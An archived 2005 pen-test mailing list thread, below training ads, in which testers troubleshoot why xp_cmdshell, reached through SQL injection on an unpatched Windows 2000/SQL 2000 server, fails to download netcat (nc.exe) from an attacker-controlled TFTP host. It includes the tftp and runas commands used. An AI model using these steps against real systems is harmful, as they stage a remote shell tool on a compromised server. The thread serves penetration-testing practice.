Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]

Re: TFTP and XP_CMDSHELL - Weird

Subject: Re: TFTP and XP_CMDSHELL - Weird
Date: Thu, 23 Jun 2005 13:38:06 +0000


From: Jose Selvi <jselvi@s2grupo.com>
To: Andres Molinetti <andymolinetti@hotmail.com>
CC: pen-test@securityfocus.com
Subject: Re: TFTP and XP_CMDSHELL - Weird
Date: Thu, 23 Jun 2005 09:16:41 +0200

Maybe sqlsvc user can't write in c:\ folder. Can He?.

The first call to tftp you are using Administrator user, who of course can write in c:\ .

Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
It must work.

It doesn't.
Besides, I have done "runas /user:sqlsvc echo a > c:\xx.exe" and the file is created.
any ideas?


If it is any useful I recieve the following error on the Target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')

In a tcpdump in my TFTP Server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede abrir el archivo para escritura"
(cannot open file for writing)


I think its beyond xp_cmdshell now..

Thanks, Andy





Andres Molinetti escribió:
Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.

While trying to use the xp_cmdshell to upload nc.exe from my tftpd server to the Webserver, I experienced some problems.

I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.

As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET nc.exe c:\nc.exe". File is downloaded.

When I tried it through the wep app it failed. I tried directly through SQL Query Analizer and it also failed.

SQL is running as a low priviledged account (sqlsvc)...

Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\nc.exe" and IT FAILED.!!

I can easily deduce that the problem is the TFTP client (tftp.exe)...

Any Ideas?

_________________________________________________________________
Descarga gratis la Barra de Herramientas de MSN http://www.msn.es/usuario/busqueda/barra?XAPID=2031&DI=1055&SU=http%3A//www.hotmail.com&HL=LINKTAG1OPENINGTEXT_MSNBH


<Prev in Thread] Current Thread [Next in Thread>